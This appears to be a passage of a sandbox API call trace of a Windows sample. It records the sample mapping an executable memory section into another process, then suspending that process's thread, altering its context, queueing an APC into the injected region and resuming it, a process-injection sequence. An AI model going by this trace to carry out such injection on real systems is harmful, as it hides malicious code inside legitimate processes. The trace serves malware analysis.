[0278.152] NtClose (Handle=0x80) returned 0x0 [0278.152] NtClose (Handle=0xa4) returned 0x0 [0278.152] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x19e604 | out: Value="RDhJ0CNFevzX") returned 0x0 [0278.167] RtlSetEnvironmentVariable (in: Environment=0x0, Name="14-ARU9T", Value="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" | out: Environment=0x0) returned 0x0 [0278.170] NtCreateSection (in: SectionHandle=0x19ed18, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19eab8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19ed18*=0xa4) returned 0x0 [0278.174] NtMapViewOfSection (in: SectionHandle=0xa4, ProcessHandle=0xffffffff, BaseAddress=0x19ed1c*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19eab8*=0x28c00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19ed1c*=0x1d0000, SectionOffset=0x0, ViewSize=0x19eab8*=0x29000) returned 0x0 [0278.180] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19e420*=0x0, ZeroBits=0x0, RegionSize=0x19e424*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19e420*=0x30000, RegionSize=0x19e424*=0x10000) returned 0x0 [0278.181] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x30000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x30000, ResultLength=0x0) returned 0xc0000004 [0278.183] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19eaac*=0x30000, RegionSize=0x19e444, FreeType=0x8000) returned 0x0 [0278.183] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19e40c*=0x0, ZeroBits=0x0, RegionSize=0x19e410*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19e40c*=0x470000, RegionSize=0x19e410*=0x20000) returned 0x0 [0278.183] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x470000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x470000, ResultLength=0x0) returned 0x0 [0278.191] NtOpenProcess (in: ProcessHandle=0x19ea74, DesiredAccess=0x438, ObjectAttributes=0x19ea94*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19ea68*(UniqueProcess=0x67c, UniqueThread=0x0) | out: ProcessHandle=0x19ea74*=0x80) returned 0x0 [0278.191] NtQueryInformationProcess (in: ProcessHandle=0x80, ProcessInformationClass=0x1a, ProcessInformation=0x19e780, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19e780, ReturnLength=0x0) returned 0x0 [0278.191] NtCreateSection (in: SectionHandle=0x19e41c, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19e3dc, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19e41c*=0xa8) returned 0x0 [0278.192] NtMapViewOfSection (in: SectionHandle=0xa8, ProcessHandle=0xffffffff, BaseAddress=0x19e424*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e3dc*=0xe7c00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e424*=0x8b0000, SectionOffset=0x0, ViewSize=0x19e3dc*=0xe8000) returned 0x0 [0278.199] NtMapViewOfSection (in: SectionHandle=0xa8, ProcessHandle=0x80, BaseAddress=0x19e420*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e418*=0xe7c00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e420*=0x81b0000, SectionOffset=0x0, ViewSize=0x19e418*=0xe8000) returned 0x0 [0278.265] NtClose (Handle=0xa8) returned 0x0 [0278.274] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x2000) returned 0x4fa818 [0278.276] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19e0e8 | out: TokenHandle=0x19e0e8*=0xa8) returned 0x0 [0278.281] NtQueryInformationToken (in: TokenHandle=0xa8, TokenInformationClass=0x1, TokenInformation=0x19d8e0, TokenInformationLength=0x400, ReturnLength=0x19e0e0 | out: TokenInformation=0x19d8e0, ReturnLength=0x19e0e0) returned 0x0 [0278.283] ConvertSidToStringSidW (in: Sid=0x19d8e8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), StringSid=0x19e0e4 | out: StringSid=0x19e0e4*="S-1-5-21-1560258661-3990802383-1811730007-1000") returned 1 [0278.283] NtClose (Handle=0xa8) returned 0x0 [0278.283] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19e358*=0x0, ZeroBits=0x0, RegionSize=0x19e35c*=0x10636, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x19e358*=0x4a0000, RegionSize=0x19e35c*=0x11000) returned 0x0 [0278.284] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19e344*=0x0, ZeroBits=0x0, RegionSize=0x19e348*=0x10636, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x19e344*=0x4c0000, RegionSize=0x19e348*=0x11000) returned 0x0 [0278.297] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19e358*=0x41d5b6, NumberOfBytesToProtect=0x19e35c, NewAccessProtection=0x40, OldAccessProtection=0x19e3a4 | out: BaseAddress=0x19e358*=0x41d000, NumberOfBytesToProtect=0x19e35c, OldAccessProtection=0x19e3a4*=0x40) returned 0x0 [0278.297] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4fa818) returned 1 [0278.308] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0x19e150, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0278.311] NtCreateFile (in: FileHandle=0x19e170, DesiredAccess=0x120089, ObjectAttributes=0x19e138*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e158, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e170*=0xa8, IoStatusBlock=0x19e158*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0278.311] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4f2560) returned 1 [0278.316] NtQueryInformationFile (in: FileHandle=0xa8, IoStatusBlock=0x19e158, FileInformation=0x19decc, Length=0x208, FileInformationClass=0x9 | out: IoStatusBlock=0x19e158, FileInformation=0x19decc) returned 0x0 [0278.316] NtClose (Handle=0xa8) returned 0x0 [0278.316] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x208) returned 0x4f05c8 [0278.316] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4f05c8) returned 1 [0278.327] NtOpenProcess (in: ProcessHandle=0x19e358, DesiredAccess=0x438, ObjectAttributes=0x19d908*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19d948*(UniqueProcess=0x67c, UniqueThread=0x0) | out: ProcessHandle=0x19e358*=0xa8) returned 0x0 [0278.330] NtQueryInformationProcess (in: ProcessHandle=0xa8, ProcessInformationClass=0x0, ProcessInformation=0x19d958, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x19d958, ReturnLength=0x0) returned 0x0 [0278.339] NtOpenThread (in: ThreadHandle=0x19d900, DesiredAccess=0x1a, ObjectAttributes=0x19d908, ClientId=0x19d938*(UniqueProcess=0x0, UniqueThread=0x680) | out: ThreadHandle=0x19d900*=0xac) returned 0x0 [0278.345] NtSuspendThread (in: ThreadHandle=0xac, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0278.355] NtGetContextThread (in: ThreadHandle=0xac, Context=0x19de50 | out: Context=0x19de50*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x10000b, FloatSave.DataSelector=0x1fa0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x46, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0xd5, [65]=0xb4, [66]=0xa, [67]=0x95, [68]=0x77, [69]=0x9, [70]=0x0, [71]=0x0, [72]=0x90, [73]=0x21, [74]=0x53, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x100d8, SegGs=0x0, SegFs=0x564a00, SegEs=0x0, SegDs=0xcfa98, Edi=0x0, Esi=0xcfb10, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0xffffffff, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x2fb0371, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x46, [5]=0x2, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0xe8, [21]=0xa7, [22]=0x99, [23]=0xaa, [24]=0xfd, [25]=0x7f, [26]=0x0, [27]=0x0, [28]=0xd0, [29]=0x20, [30]=0x56, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0xa0, [37]=0xda, [38]=0x2f, [39]=0xaa, [40]=0xfd, [41]=0x7f, [42]=0x0, [43]=0x0, [44]=0x34, [45]=0x20, [46]=0xf3, [47]=0xab, [48]=0xfd, [49]=0x7f, [50]=0x0, [51]=0x0, [52]=0x7f, [53]=0x2, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0xa0, [77]=0x1f, [78]=0x0, [79]=0x0, [80]=0xff, [81]=0xff, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0278.362] NtSetContextThread (ThreadHandle=0xac, Context=0x19de50*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x10000b, FloatSave.DataSelector=0x1fa0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x46, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0xd5, [65]=0xb4, [66]=0xa, [67]=0x95, [68]=0x77, [69]=0x9, [70]=0x0, [71]=0x0, [72]=0x90, [73]=0x21, [74]=0x53, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x100d8, SegGs=0x0, SegFs=0x564a00, SegEs=0x0, SegDs=0xcfa98, Edi=0x0, Esi=0xcfb10, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0xffffffff, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x2fb0371, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x46, [5]=0x2, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0xe8, [21]=0xa7, [22]=0x99, [23]=0xaa, [24]=0xfd, [25]=0x7f, [26]=0x0, [27]=0x0, [28]=0xd0, [29]=0x20, [30]=0x56, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0xa0, [37]=0xda, [38]=0x2f, [39]=0xaa, [40]=0xfd, [41]=0x7f, [42]=0x0, [43]=0x0, [44]=0xe5, [45]=0x98, [46]=0x1f, [47]=0x8, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x7f, [53]=0x2, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0xa0, [77]=0x1f, [78]=0x0, [79]=0x0, [80]=0xff, [81]=0xff, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0278.365] NtQueueApcThread (ThreadHandle=0xac, ApcRoutine=0x81f9909, NormalContext=0x0, SystemArgument1=0x0, SystemArgument2=0x0) returned 0x0 [0278.369] NtResumeThread (in: ThreadHandle=0xac, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0278.369] NtClose (Handle=0xa8) returned 0x0 [0278.369] NtClose (Handle=0xac) 